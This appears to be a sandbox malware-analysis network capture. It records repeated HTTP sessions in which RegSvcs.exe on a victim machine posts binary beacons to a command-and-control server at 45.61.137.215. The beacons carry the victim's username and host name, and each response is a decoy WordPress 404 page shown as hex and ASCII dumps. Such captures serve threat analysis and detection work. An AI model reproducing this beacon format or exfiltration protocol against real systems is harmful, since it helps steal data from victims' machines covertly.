                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:20.001477957 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:20.001490116 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:20.001502037 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:44:20.001513958 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:44:20.001524925 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:20.001534939 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:44:20.001543999 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:44:20.001554012 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                                            May 29, 2024 15:44:20.001565933 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            50192.168.2.94976545.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:20.226591110 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:20.234719992 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:22.770471096 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:20 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:22.770488977 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:22.770509958 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:22.770519972 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:44:22.770531893 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:44:22.771187067 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:22.771245956 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:44:22.771256924 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:44:22.771342039 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                                            May 29, 2024 15:44:22.771472931 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            51192.168.2.94976645.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:22.948803902 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:22.954634905 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:25.480535984 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:23 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:25.480561972 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:25.480572939 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:25.480585098 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:44:25.480597973 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:44:25.480609894 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:44:25.480622053 CEST1236INData Raw: 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64
                                            Data Ascii: near-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(13
                                            May 29, 2024 15:44:25.480633974 CEST896INData Raw: 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74
                                            Data Ascii: ed: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .
                                            May 29, 2024 15:44:25.480648041 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:44:25.480658054 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            52192.168.2.94976745.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:25.723485947 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:25.728465080 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:28.196142912 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:26 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
